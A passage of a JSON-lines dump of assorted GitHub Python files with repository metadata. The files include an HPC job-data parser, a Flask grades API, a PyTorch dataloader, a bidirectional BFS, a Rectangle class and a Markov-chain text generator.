['Partition','ReqNodes','ReqCPUS','NNodes','Timelimit','Submit',\"Weekday\",\"WeekNumber\",\"sin(Weekday)\",\"cos(Weekday)\",\"Dayminute\",\"sin(Dayminute)\",\"cos(Dayminute)\",'QueueTime']\r\n\r\n print(\"...Compute size of the dataset and number of weeks\")\r\n sheetLength = len(workingDataset[\"WeekNumber\"])\r\n parsed_data_path = data_and_scripts_location[\"Data/parsed\"]\r\n \r\n #--------------------------------------------OUTPUT------------------------------------------------------------------\r\n output = parsed_data_path + \"/parsed_data_size=\"+str(sheetLength)+\"_weeks=\"+str(totalweeks)+\".csv\"\r\n #--------------------------------------------OUTPUT------------------------------------------------------------------\r\n \r\n workingDataset[cols].to_csv(output, sep=\",\", index = False)\r\n\r\n print(\"-------------------------------------done-------------------------------------------------------------\")\r\n\r\n a,b=workingDataset.shape\r\n print(\"Total time needed to parse %i entries:\" % a)\r\n print(\"--- %s seconds ---\" % (time.time() - 
start_time))\r\n \r\n print(\"Output: %s\"%output)\r\n \r\n return output\r\n\r\n\r\n\r\n\r\ndef split_original_parsed_dataset(number_weeks_training, name_parsed_dataset_csv):\r\n #-----------------------------------------------IMPORT TIME--------------------------------------------------------\r\n import time\r\n #-----------------------------------------------IMPORT TIME--------------------------------------------------------\r\n start_time = time.time()\r\n\r\n data_and_scripts_location = all_paths()\r\n parsed_data_path = data_and_scripts_location[\"Data/parsed\"]\r\n\r\n #-----------------------------------------------IMPORT PANDAS--------------------------------------------------------\r\n import pandas as pd\r\n #-----------------------------------------------IMPORT PANDAS--------------------------------------------------------\r\n\r\n DF = pd.read_csv(parsed_data_path + \"/\" + name_parsed_dataset_csv, sep=',', low_memory = False)\r\n\r\n print(\"Start splitting the dataset...\")\r\n\r\n requiredFeatures = ['Partition','ReqNodes','ReqCPUS','NNodes','Timelimit','Submit',\"Weekday\",\"WeekNumber\",\"sin(Weekday)\",\"cos(Weekday)\",\"Dayminute\",\"sin(Dayminute)\",\"cos(Dayminute)\",'QueueTime']\r\n workingDataset = DF.loc[:,requiredFeatures]\r\n necessaryFeatures = ['Partition','ReqNodes','ReqCPUS','NNodes','Timelimit',\"Weekday\",\"sin(Weekday)\",\"cos(Weekday)\",\"Dayminute\",\"sin(Dayminute)\",\"cos(Dayminute)\",'QueueTime']\r\n totalweeks = workingDataset[\"WeekNumber\"].values[-1]\r\n totalsize = len(workingDataset[\"WeekNumber\"])\r\n \r\n\r\n # Make training dataset\r\n # weeks_training = 5\r\n weeks_training = number_weeks_training\r\n l_wn = workingDataset[\"WeekNumber\"].values <= weeks_training\r\n sheetSize = len(workingDataset[\"WeekNumber\"].loc[l_wn])\r\n #--------------------------------------------OUTPUT------------------------------------------------------------------\r\n output = parsed_data_path + \"/training_set_size=\"+ str(sheetSize) +\"_weeks=\"+ str(weeks_training) +\".csv\"\r\n #--------------------------------------------OUTPUT------------------------------------------------------------------\r\n workingDataset[necessaryFeatures].loc[l_wn].to_csv(output, sep=\",\",index=False)\r\n\r\n print(\"\\nDateset consisting of %i entries and %i weeks split into:\\n 1 training set of %i entries equivalent to %i weeks of job submissions\\n\"%(totalsize,totalweeks,sheetSize,weeks_training))\r\n\r\n # Make test sets\r\n number_test_sets = len(range(weeks_training+1,int(totalweeks)))\r\n print(\" %i Test sets for each of the following weeks:\"% number_test_sets)\r\n for w in range(weeks_training+1,int(totalweeks)):\r\n l_wn_tests = workingDataset[\"WeekNumber\"].values == w\r\n sheetSize = len(workingDataset[\"WeekNumber\"].loc[l_wn_tests])\r\n workingDataset[necessaryFeatures].loc[l_wn_tests].to_csv(parsed_data_path + \"/test_set_size=\"+ str(sheetSize) +\"_week=\"+ str(w) +\".csv\", sep=\",\",index=False)\r\n print(\" %i entries equivalent to %i week of job submissions\"%(sheetSize,1))\r\n\r\n\r\n print(\"Splitting complete. 
Total time needed:\")\r\n print(\"--- %s seconds ---\" % (time.time() - start_time))\r\n \r\n print(\"Ouput: %s\"%output)\r\n \r\n return output","repo_name":"uoparaji/HPC-Forecaster","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":11747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42235435120","text":"def averange_lenght(name):\r\n #lets do not create another variable for storing\r\n av = 0\r\n with open(name, 'r') as f:\r\n for index, line in enumerate(f):\r\n words = [word.strip() for word in line.split()]\r\n av += sum(len(word) for word in words)\r\n\r\n number_of_words = len(words)\r\n if index != 0:\r\n number_of_words += 1\r\n av = av/number_of_words\r\n return av\r\n\r\nfile_name = input(\"Please enter filename:\")\r\n#file_name = 'words.txt'\r\nprint(averange_lenght(file_name))\r\n\r\n","repo_name":"Boberkraft/python","sub_path":"simple-python-ex46/38. Average word lenght.py","file_name":"38. Average word lenght.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"40881894285","text":"from itertools import combinations\n\ndef gcd(a, b):\n while b:\n a, b = b, a % b\n return a\n\nt = int(input())\nfor _ in range(t):\n data = list(map(int, input().split()))\n data = data[1:]\n answer = 0\n for a, b in list(combinations(data, 2)):\n answer += gcd(a, b)\n print(answer)","repo_name":"parkgr95/Algorithm-Baekjoon","sub_path":"임시/9613.py","file_name":"9613.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14954913107","text":"GRAPHITE_ENDPOINT = \"qa-api-performance-graphite\"\n\nrecord_count = {\n \"Smoke\": 10,\n \"100K\": 100000,\n \"500K\": 500000,\n \"1M\": 1000000,\n \"5M\": 5000000,\n \"10M\": 10000000\n}\n\ndata_class = [\n \"cancer_assessment\",\n \"clinical_test_result\",\n \"department\",\n \"encounter\",\n \"imaging\",\n \"medication_admin\",\n \"medication_order\",\n \"patient\",\n \"patient_condition\",\n \"performance_status\",\n \"procedure_order\",\n \"protocol\",\n \"provider\",\n \"surgery\",\n \"test_order\",\n \"treatment_plan\"\n]\n\n","repo_name":"devdasgupta/qa-data-migration-performance","sub_path":"script/utility/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1995041779","text":"import os\nimport sqlalchemy\nimport api.utils.logger as log_util\n\nlogger = log_util.get_logger(__name__, 'INFO')\n\n\ndef get_engine(database_name):\n engine = sqlalchemy.create_engine(f\"mysql+pymysql://{os.getenv('db_user')}:{os.getenv('db_password')}@{os.getenv('db_host')}/{database_name}\")\n return engine\n\n\ndef init_database(database_name):\n engine = get_engine(database_name=database_name)\n\n create_tables = [\n \"tbl_user\",\n \"tbl_ball_team\",\n \"tbl_fantasy_team\",\n \"tbl_fantasy_team_user_mtm\",\n \"tbl_player\",\n \"tbl_draft_event\",\n \"tbl_game\",\n \"tbl_box_score_line_item\"\n ]\n\n create_views = [\n \"vw_roster\",\n \"vw_team_ownership\"\n ]\n\n for table in create_tables:\n\n with open(f\"{os.getcwd()}/src/model/schema/{table}.sql\", 'r') as file:\n ddl = file.read()\n\n logger.info(f'Creating table {table}')\n\n with engine.connect() as conn:\n try:\n conn.execute(ddl)\n except Exception as e:\n logger.error(e)\n 
logger.info(f\"Failed to create table {table}\")\n\n for view in create_views:\n\n with open(f\"{os.getcwd()}/src/model/view/{view}.sql\", 'r') as file:\n ddl = file.read()\n\n logger.info(f'Creating view {table}')\n with engine.connect() as conn:\n conn.execute(ddl)\n","repo_name":"benvneal88/ncaa-bb-fantasy-manager","sub_path":"services/app/src/api/utils/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21746775659","text":"\"\"\" 测试 __subclasshook__ 方法\n\nRenderer1 没有相关方法,返回为 False\n>>> class Renderer1:\n... pass\n...\n>>> isinstance(Renderer1(), Renderer)\nFalse\n\n\nRenderer2 有相关方法,返回为 True\n>>> class Renderer2:\n... def header(self):\n... pass\n...\n... def paragraph(self):\n... pass\n...\n... def footer(self):\n... pass\n...\n>>> isinstance(Renderer2(), Renderer)\nTrue\n\n\n相关方法也可以是属性\n>>> class Renderer3:\n... header = None\n... paragraph = None\n... footer = None\n...\n>>> isinstance(Renderer3(), Renderer)\nTrue\n\"\"\"\n\nimport abc\nimport collections\n\n\nclass Renderer(metaclass=abc.ABCMeta):\n\n @classmethod\n def __subclasshook__(Class, Subclass):\n \"\"\"可以在无须继承特定基类的前提下,创建出某套符合接口的对象\"\"\"\n if Class is Renderer:\n # 调用 Subclass.__mro__() 方法\n # 遍历 Subclass 及其超类的 Superclass.__dict__\n attributes = collections.ChainMap(\n *(Superclass.__dict__ for Superclass in Subclass.__mro__))\n # 将待检测的方法放在一个元组中\n methods = (\"header\", \"paragraph\", \"footer\")\n # 遍历元组中的方法,判断这些方法是不是都在 attributes 映射表中\n if all(method in attributes for method in methods):\n # 如果 methods 中每个方法都在 attributes 映射表里,那就返回 True\n return True\n # 通过 Class 参数判断自己是不是在 Renderer 类上调用\n # 不是则返回 NotImplemented\n return NotImplemented\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","repo_name":"AngelLiang/pipeg","sub_path":"ch02/ch02_01-adapter/subclasshook.py","file_name":"subclasshook.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6103126393","text":"from skimage import transform\nimport re\nimport numpy as np\nimport cv2\n\nPREFIX = 'rot'\nREGEX = re.compile(r\"^\" + PREFIX + \"_(?P-?[0-9]+)\")\n\nclass Rotate:\n def __init__(self, angle):\n self.angle = angle\n self.code = PREFIX + str(angle)\n\n def process(self, img):\n #return transform.rotate(img, -self.angle)\n rows,cols,ch = img.shape\n\n #M = np.float32([[1,0,2],[0,1,4]])\n #dst = cv2.warpAffine(img,M,(cols,rows))\n\n M = cv2.getRotationMatrix2D((cols/2,rows/2),self.angle,1.0)\n dst = cv2.warpAffine(img,M,(cols,rows))\n\n return(dst)\n\n @staticmethod\n def match_code(code):\n match = REGEX.match(code)\n if match:\n d = match.groupdict()\n return Rotate(int(d['angle']))\n","repo_name":"zzvvmm/image-augmentor","sub_path":"ops/rotate.py","file_name":"rotate.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41828693586","text":"from torch import nn\nfrom torch.utils.data import Dataset\nfrom PIL import Image\nimport os\nimport torchvision.transforms as T\nfrom split_dataset import train_test_file\n\n\ndef get_dataloader():\n\n DATA_DIR = 'main/'\n\n class APN_Dataset(Dataset):\n def __init__(self, df, transform=None):\n self.df = df\n self.transform = transform\n\n def __len__(self):\n return len(self.df)\n\n def __getitem__(self, idx):\n\n row = self.df.iloc[idx]\n A_img = 
Image.open(os.path.join(\n DATA_DIR, row.Anchor)).convert(\"RGB\")\n P_img = Image.open(os.path.join(\n DATA_DIR, row.Positive)).convert(\"RGB\")\n N_img = Image.open(os.path.join(\n DATA_DIR, row.Negative)).convert(\"RGB\")\n\n label = row.Label\n\n if self.transform:\n A_img = self.transform(A_img)\n P_img = self.transform(P_img)\n N_img = self.transform(N_img)\n\n return A_img, P_img, N_img, label\n\n ImageNet_Mean_Std = ([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n\n size = 224\n\n transformer_train = T.Compose([\n T.Resize(size),\n T.RandomVerticalFlip(0.4),\n T.RandomHorizontalFlip(0.4),\n T.RandomAdjustSharpness(sharpness_factor=2),\n T.RandomAutocontrast(),\n T.CenterCrop(size),\n T.ToTensor(),\n T.Normalize(*ImageNet_Mean_Std)\n ])\n\n transformer_test = T.Compose([\n T.Resize(size),\n T.CenterCrop(size),\n T.ToTensor(),\n T.Normalize(*ImageNet_Mean_Std)\n ])\n\n train_df, test_df = train_test_file()\n trainset = APN_Dataset(train_df, transformer_test)\n\n return trainset\n","repo_name":"ornob011/Abdomen_Expert","sub_path":"dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28620707488","text":"import torch\nimport os\nimport argparse\nimport sys\nimport numpy as np\n\ndef get_args():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"output_folder\", type = str, help='the folder name for this prepped model')\n\targs = parser.parse_args()\n\treturn args\n\n\nargs = get_args()\nprint(args)\noutput_folder = args.output_folder\n\nsys.path.insert(0, os.path.abspath('../prepped_models/%s'%output_folder))\n\nos.chdir(os.path.abspath('../prepped_models/%s'%output_folder))\nimport prep_model_params_used as params\nos.chdir('../../prep_model_scripts')\n\nmodel = params.model\n\n\ndef get_kernels_Conv2d_modules(module,kernels=[]): \n\tfor layer, (name, submodule) in enumerate(module._modules.items()):\n\t\t#print(submodule)\n\t\tif isinstance(submodule, torch.nn.modules.conv.Conv2d):\n\t\t\tkernels.append(submodule.weight.cpu().detach().numpy())\n\t\telif len(list(submodule.children())) > 0:\n\t\t\tkernels = get_kernels_Conv2d_modules(submodule,kernels=kernels) #module has modules inside it, so recurse on this module\n\n\treturn kernels\n\n#function for return a kernels inhibition/exhitation value, normalized between -1 and 1\ndef gen_kernel_posneg(kernels):\n kernel_colors = []\n for i, layer in enumerate(kernels):\n average = np.average(np.average(layer,axis=3),axis=2)\n absum = np.sum(np.sum(np.abs(layer),axis=3),axis=2)\n unnormed_layer_colors = average/absum\n #normalize layer between -1 and 1\n normed_layer_colors = 2/(np.max(unnormed_layer_colors)-np.min(unnormed_layer_colors))*(unnormed_layer_colors-np.max(unnormed_layer_colors))+1\n kernel_colors.append(normed_layer_colors)\n return kernel_colors\n\n#function that takes kernel posneg values from -1 to 1 and returns rgba values\ndef posneg_to_rgb(kernel_posneg,color_anchors = [[10, 87, 168],[170,170,170],[194, 0, 19]]):\n \n #define a function for converting 'p' values between 0 and 1 to a 3 color vector\n color_anchors = np.array(color_anchors)\n def f(p,color_anchors=color_anchors):\n if p < .5:\n return np.rint(np.minimum(np.array([255,255,255]),color_anchors[1] * p * 2 + color_anchors[0] * (0.5 - p) * 2))\n else:\n return np.rint(np.minimum(np.array([255,255,255]),color_anchors[2] * (p - 0.5) * 2 + color_anchors[1] * (1 - p) * 2))\n #fnp = np.frompyfunc(f,1,1) \n fnp = 
np.vectorize(f,signature='()->(n)') \n\n    kernel_colors = []\n    for i, layer in enumerate(kernel_posneg):\n        #nonlinear color interpolation\n        ps = (layer+1)/2\n        #ps = 1/(1+np.exp(-2*layer))\n        kernel_colors.append(fnp(ps))\n    return kernel_colors\n\n\n\nkernels = get_kernels_Conv2d_modules(model)\nkernel_posneg = gen_kernel_posneg(kernels)\nkernel_colors = posneg_to_rgb(kernel_posneg)\n\nall_dict = {'kernels':kernels,\n\t\t\t'kernels_posneg':kernel_posneg,\n\t\t\t'kernel_colors':kernel_colors}\n\ntorch.save(all_dict,'../prepped_models/'+params.output_folder+'/kernels.pt')\n\n","repo_name":"chrishamblin7/viscnn","sub_path":"prep_model_scripts/get_kernels.py","file_name":"get_kernels.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"3"} +{"seq_id":"30038020146","text":"from flask import Blueprint, jsonify, request, g\r\nfrom app.db import get_db\r\n\r\nbp = Blueprint(\"grades\", __name__, url_prefix=\"/api/grades\")\r\n\r\n@bp.route(\"\", methods=[\"GET\"])\r\ndef get_grades():\r\n    db = get_db()\r\n    grades = db.execute(\"SELECT * FROM grades\").fetchall()\r\n    return jsonify([dict(grade) for grade in grades])\r\n\r\n@bp.route(\"\", methods=[\"POST\"])\r\ndef create_grade():\r\n    db = get_db()\r\n    data = request.get_json()\r\n    student_id = data.get(\"student_id\")\r\n    course_id = data.get(\"course_id\")\r\n    grade = data.get(\"grade\")\r\n    if student_id is None:\r\n        return jsonify({\"error\": \"Student ID is required\"}), 400\r\n    if course_id is None:\r\n        return jsonify({\"error\": \"Course ID is required\"}), 400\r\n    if grade is None:\r\n        return jsonify({\"error\": \"Grade is required\"}), 400\r\n    db.execute(\"INSERT INTO grades (student_id, course_id, grade) VALUES (?, ?, ?)\", (student_id, course_id, grade))\r\n    db.commit()\r\n    return jsonify({\"message\": \"Grade created successfully\"})\r\n\r\n@bp.route(\"/<int:id>\", methods=[\"GET\"])\r\ndef get_grade(id):\r\n    db = get_db()\r\n    grade = db.execute(\"SELECT * FROM grades WHERE id = ?\", (id,)).fetchone()\r\n    if grade is None:\r\n        return jsonify({\"error\": \"Grade not found\"}), 404\r\n    return jsonify(dict(grade))\r\n\r\n@bp.route(\"/<int:id>\", methods=[\"PUT\"])\r\ndef update_grade(id):\r\n    db = get_db()\r\n    data = request.get_json()\r\n    student_id = data.get(\"student_id\")\r\n    course_id = data.get(\"course_id\")\r\n    grade = data.get(\"grade\")\r\n    if student_id is None:\r\n        return jsonify({\"error\": \"Student ID is required\"}), 400\r\n    if course_id is None:\r\n        return jsonify({\"error\": \"Course ID is required\"}), 400\r\n    if grade is None:\r\n        return jsonify({\"error\": \"Grade is required\"}), 400\r\n    db.execute(\"UPDATE grades SET student_id = ?, course_id = ?, grade = ? 
WHERE id = ?\", (student_id, course_id, grade, id))\r\n db.commit()\r\n return jsonify({\"message\": \"Grade updated successfully\"})\r\n\r\n@bp.route(\"/\", methods=[\"DELETE\"])\r\ndef delete_grade(id):\r\n db = get_db()\r\n db.execute(\"DELETE FROM grades WHERE id = ?\", (id,))\r\n db.commit()\r\n return jsonify({\"message\": \"Grade deleted successfully\"})\r\n\r\n ","repo_name":"adekunle8032/Altschool-third-semester-project2","sub_path":"app/students_api/routes/grades.py","file_name":"grades.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43119551939","text":"# Python3 program for Bidirectional BFS \n# Search to check jalur between two vertices\n\n# Pendefinisian Class dari node\n# untuk ditambahkan pada graph\nclass AdjacentNode:\n\t\n\tdef __init__(self, vertex):\n\t\t\n\t\tself.vertex = vertex\n\t\tself.next = None\n\n# Implementasi BidirectionalSearch\nclass BidirectionalSearch:\n\t\n\tdef __init__(self, jumlahNode):\n\t\t\n\t\t# Simpan jumlah node\n\t\t# siapkan list untuk menyimpan node\n\t\tself.jumlahNode = jumlahNode\n\t\tself.graph = [None] * self.jumlahNode\n\t\t\n\t\t# Inisialisasi queue untuk forward search \n\t\t# dan backward search\n\t\tself.src_queue = list()\n\t\tself.dest_queue = list()\n\t\t\n\t\t# Inisialisasi node yang telah dikunjungi dari forward dan \n\t\t# backward search as False\n\t\tself.src_visited = [False] * self.jumlahNode\n\t\tself.dest_visited = [False] * self.jumlahNode\n\t\t\n\t\t# Inisialisasi parent node dari source \n\t\t# dan destination\n\t\tself.src_parent = [None] * self.jumlahNode\n\t\tself.dest_parent = [None] * self.jumlahNode\n\t\t\n\t# Fungsi untuk menambahkan undirected edge/garis\n\tdef tambah_garis(self, src, dest): \n\t\t\n\t\t# Menambahkan edge pada graf\n\t\t\n\t\t# Tambah source ke destination\n\t\tnode = AdjacentNode(dest) \n\t\tnode.next = self.graph[src] \n\t\tself.graph[src] = node \n\n\t\t# Karena graph bersifat undirected, tambah\n\t\t# destination ke source\n\t\tnode = AdjacentNode(src)\n\t\tnode.next = self.graph[dest]\n\t\tself.graph[dest] = node\n\t\t\n\t# Fungsi untuk Breadth First Search \n\tdef bfs(self, direction = 'forward'):\n\t\t\n\t\tif direction == 'forward':\n\t\t\t\n\t\t\t# BFS secara forward\n\t\t\tcurrent = self.src_queue.pop(0)\n\t\t\tconnected_node = self.graph[current]\n\t\t\t\n\t\t\twhile connected_node:\n\t\t\t\tvertex = connected_node.vertex\n\t\t\t\t\n\t\t\t\tif not self.src_visited[vertex]:\n\t\t\t\t\tself.src_queue.append(vertex)\n\t\t\t\t\tself.src_visited[vertex] = True\n\t\t\t\t\tself.src_parent[vertex] = current\n\t\t\t\t\t\n\t\t\t\tconnected_node = connected_node.next\n\t\telse:\n\t\t\t\n\t\t\t# BFS secara backward\n\t\t\tcurrent = self.dest_queue.pop(0)\n\t\t\tconnected_node = self.graph[current]\n\t\t\t\n\t\t\twhile connected_node:\n\t\t\t\tvertex = connected_node.vertex\n\t\t\t\t\n\t\t\t\tif not self.dest_visited[vertex]:\n\t\t\t\t\tself.dest_queue.append(vertex)\n\t\t\t\t\tself.dest_visited[vertex] = True\n\t\t\t\t\tself.dest_parent[vertex] = current\n\t\t\t\t\t\n\t\t\t\tconnected_node = connected_node.next\n\t\t\t\t\n\t# Cek apakah ada vertex yang berpotongan dari\n\t# backward search dan forward search \n\tdef is_intersecting(self):\n\t\t\n\t\t# Mengembalikan pada node mana perpotongannya\n\t\t# jika tidak ada maka kembalikan 1\n\t\tfor i in range(self.jumlahNode):\n\t\t\tif (self.src_visited[i] and\n\t\t\t\tself.dest_visited[i]):\n\t\t\t\treturn i\n\t\t\t\t\n\t\treturn -1\n\n\t# 
Print jalur dari sumber ke target\n\tdef print_jalur(self, intersecting_node, \n\t\t\t\tsrc, dest):\n\t\t\t\t\t\t\n\t\t# Print jalur akhir dari \n\t\t# source ke destination\n\t\tjalur = list()\n\t\tjalur.append(intersecting_node)\n\t\ti = intersecting_node\n\t\t\n\t\twhile i != src:\n\t\t\tjalur.append(self.src_parent[i])\n\t\t\ti = self.src_parent[i]\n\t\t\t\n\t\tjalur = jalur[::-1]\n\t\ti = intersecting_node\n\t\t\n\t\twhile i != dest:\n\t\t\tjalur.append(self.dest_parent[i])\n\t\t\ti = self.dest_parent[i]\n\t\t\t\n\t\tprint(\"***** Jalur *****\")\n\t\tjalur = list(map(str, jalur))\n\t\t\n\t\tprint(' '.join(jalur))\n\t\n\t# Fungsi untuk bidirectional search \n\tdef bidirectional_search(self, src, dest):\n\t\t\n\t\t# Tambah source ke queue dan tandai \n\t\t# visited sebagai True dan tambahkan parent \n\t\t# sebagai -1\n\t\tself.src_queue.append(src)\n\t\tself.src_visited[src] = True\n\t\tself.src_parent[src] = -1\n\t\t\n\t\t# Tambah destination ke queue dan tandai \n\t\t# visited sebagai True dan tambahkan parent\n\t\t# sebagai -1\n\t\tself.dest_queue.append(dest)\n\t\tself.dest_visited[dest] = True\n\t\tself.dest_parent[dest] = -1\n\n\t\twhile self.src_queue and self.dest_queue:\n\t\t\t\n\t\t\t# BFS dari arah forward direction\n\t\t\tself.bfs(direction = 'forward')\n\t\t\t\n\t\t\t# BFS dari arah berlawanan\n\t\t\tself.bfs(direction = 'backward')\n\t\t\t\n\t\t\t# Cek node yang berpotongan\n\t\t\tintersecting_node = self.is_intersecting()\n\t\t\t\n\t\t\t# Jika node berpotonagan ada\n\t\t\t# maka jalur dari source ke destination ada\n\t\t\tif intersecting_node != -1:\n\t\t\t\tprint(f\"jalur ada antara {src} dan {dest}\")\n\t\t\t\tprint(f\"Berpotongan pada : {intersecting_node}\")\n\t\t\t\tself.print_jalur(intersecting_node, \n\t\t\t\t\t\t\t\tsrc, dest)\n\t\t\t\texit(0)\n\t\treturn -1\n\n# Driver code\nif __name__ == \"__main__\":\n\t\n\t# Benyak node di dalam graph\n\tn = 18\n\t\n\t# Start Node\n\tsrc = 3\n\t\n\t# End Node\n\tdest = 15\n\t\n\t# Buat Graph\n\tgraph = BidirectionalSearch(n)\n\tgraph.tambah_garis(0, 2)\n\tgraph.tambah_garis(1, 2)\n\tgraph.tambah_garis(2, 3)\n\tgraph.tambah_garis(3, 4)\n\tgraph.tambah_garis(3, 5)\n\tgraph.tambah_garis(5, 6)\n\tgraph.tambah_garis(5, 7)\n\tgraph.tambah_garis(5, 8)\n\tgraph.tambah_garis(8, 9)\n\tgraph.tambah_garis(8, 10)\n\tgraph.tambah_garis(10, 11)\n\tgraph.tambah_garis(11, 12)\n\tgraph.tambah_garis(11, 13)\n\tgraph.tambah_garis(10, 14)\n\tgraph.tambah_garis(14, 15)\n\tgraph.tambah_garis(15, 16)\n\tgraph.tambah_garis(14, 17)\n\n\n\t\n\tout = graph.bidirectional_search(src, dest)\n\t\n\tif out == -1:\n\t\tprint(f\"Tidak ada jalur penghubung antara node ke-{src} and ke-{dest}\")\n\n\n","repo_name":"modul60stis/ai-uts","sub_path":"Bidirectional search/BD.py","file_name":"BD.py","file_ext":"py","file_size_in_byte":4914,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13223951799","text":"#!/usr/bin/python3\n\"\"\"\nFile: rectangle.py\nDesc: This module contains a class, Rectangle\n\"\"\"\n\nfrom models.base import Base\n\n\nclass Rectangle(Base):\n \"\"\"\n A class representing a rectangle.\n \"\"\"\n def __init__(self, width, height, x=0, y=0, id=None):\n \"\"\"\n Initializes the Rectangle object.\n \"\"\"\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n super().__init__(id)\n\n def __str__(self):\n \"\"\"\n Returns a string representation of the Rectangle.\n \"\"\"\n return f\"[Rectangle] ({self.id}) {self.x}/{self.y} - {self.width}/{self.height}\"\n\n def 
check_value(self, name, value, sides=True):\n \"\"\"\n Checks if the correct input was inserted for width, height, x, and y attributes.\n \"\"\"\n if type(value) != int:\n raise TypeError(f\"{name} must be an integer\")\n if sides:\n if value <= 0:\n raise ValueError(f\"{name} must be > 0\")\n elif value < 0:\n raise ValueError(f\"{name} must be >= 0\")\n\n @property\n def width(self):\n \"\"\"\n Getter for the width attribute.\n \"\"\"\n return self.__width\n\n @width.setter\n def width(self, value):\n \"\"\"\n Sets the value for the width attribute.\n \"\"\"\n self.check_value('width', value)\n self.__width = value\n\n @property\n def height(self):\n \"\"\"\n Getter for the height attribute.\n \"\"\"\n return self.__height\n\n @height.setter\n def height(self, value):\n \"\"\"\n Sets the value for the height attribute.\n \"\"\"\n self.check_value('height', value)\n self.__height = value\n\n @property\n def x(self):\n \"\"\"\n Getter for the x attribute.\n \"\"\"\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\"\n Sets the value for the x attribute.\n \"\"\"\n self.check_value('x', value, False)\n self.__x = value\n\n @property\n def y(self):\n \"\"\"\n Getter for the y attribute.\n \"\"\"\n return self.__y\n\n @y.setter\n def y(self, value):\n \"\"\"\n Sets the value for the y attribute.\n \"\"\"\n self.check_value('y', value, False)\n self.__y = value\n\n def area(self):\n \"\"\"\n Returns the area of the rectangle.\n \"\"\"\n return self.__width * self.__height\n\n def display(self):\n \"\"\"\n Prints the Rectangle instance with the character '#'.\n \"\"\"\n print(\"\\n\" * self.__y, end='')\n for i in range(self.__height):\n print((' ' * self.__x) + ('#' * self.__width) + '\\n', end='')\n\n def update(self, *args, **kwargs):\n \"\"\"\n Updates the attribute values.\n \"\"\"\n if len(args):\n for n, arg in enumerate(args):\n if n == 0:\n self.id = arg\n elif n == 1:\n self.width = arg\n elif n == 2:\n self.height = arg\n elif n == 3:\n self.x = arg\n elif n == 4:\n self.y = arg\n else:\n if \"id\" in kwargs:\n self.id = kwargs[\"id\"]\n if \"width\" in kwargs:\n self.width = kwargs[\"width\"]\n if \"height\" in kwargs:\n self.height = kwargs[\"height\"]\n if \"x\" in kwargs:\n self.x = kwargs[\"x\"]\n if \"y\" in kwargs:\n self.y = kwargs[\"y\"]\n\n def to_dictionary(self):\n \"\"\"\n Returns the dictionary representation of the class.\n \"\"\"\n d = {}\n d[\"id\"] = self.id\n d[\"width\"] = self.width\n d[\"height\"] = self.height\n d[\"x\"] = self.x\n d[\"y\"] = self.y\n return d\n","repo_name":"Obifineprince/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/rectangle.py","file_name":"rectangle.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74759044241","text":"import random\nimport emoji\nfrom tweet_counter import count_tweet\n\n#https://towardsdatascience.com/simulating-text-with-markov-chains-in-python-1a27e6d13fc6\n\ndef is_emojiblock(text):\n if len(text) <= 1:\n return False\n \n for character in text:\n if character not in emoji.UNICODE_EMOJI_ENGLISH:\n return False\n return True\n\ndef make_pairs(corpus):\n for i in range(len(corpus)-1):\n yield (corpus[i], corpus[i+1])\n\ndef make_trios(corpus):\n for i in range(len(corpus)-2):\n yield (corpus[i], corpus[i+1], corpus[i+2])\n\ndef mod_key(key):\n if is_emojiblock(key):\n return \"<|emojiblock|>\"\n else:\n return key.lower()\n\ndef load_corpus(filepath):\n text = open(filepath, 
encoding='utf8').read()\n\n corpus = text.split()\n\n emojiCorpus = []\n for i, t in enumerate(corpus):\n if is_emojiblock(t):\n corpus[i] = \"<|emojiblock|>\"\n emojiCorpus.append(t)\n\n emojiCorpus = '\\n'.join(emojiCorpus)\n \n pairs = make_pairs(corpus)\n trios = make_trios(corpus)\n emojiPairs = make_pairs(emojiCorpus)\n\n word_dict_one = {}\n word_dict_two = {}\n emoji_dict_one = {}\n\n for word_1, word_2 in pairs:\n word_1 = mod_key(word_1)\n if word_1 in word_dict_one.keys():\n word_dict_one[word_1].append(word_2)\n else:\n word_dict_one[word_1] = [word_2]\n\n for word_1, word_2, word_3 in trios:\n word_1 = mod_key(word_1)\n word_2 = mod_key(word_2)\n if (word_1, word_2) in word_dict_two.keys():\n word_dict_two[(word_1, word_2)].append(word_3)\n else:\n word_dict_two[(word_1, word_2)] = [word_3]\n\n for emoji_1, emoji_2 in emojiPairs:\n if emoji_1 in emoji_dict_one.keys():\n emoji_dict_one[emoji_1].append(emoji_2)\n else:\n emoji_dict_one[emoji_1] = [emoji_2]\n\n first_words = 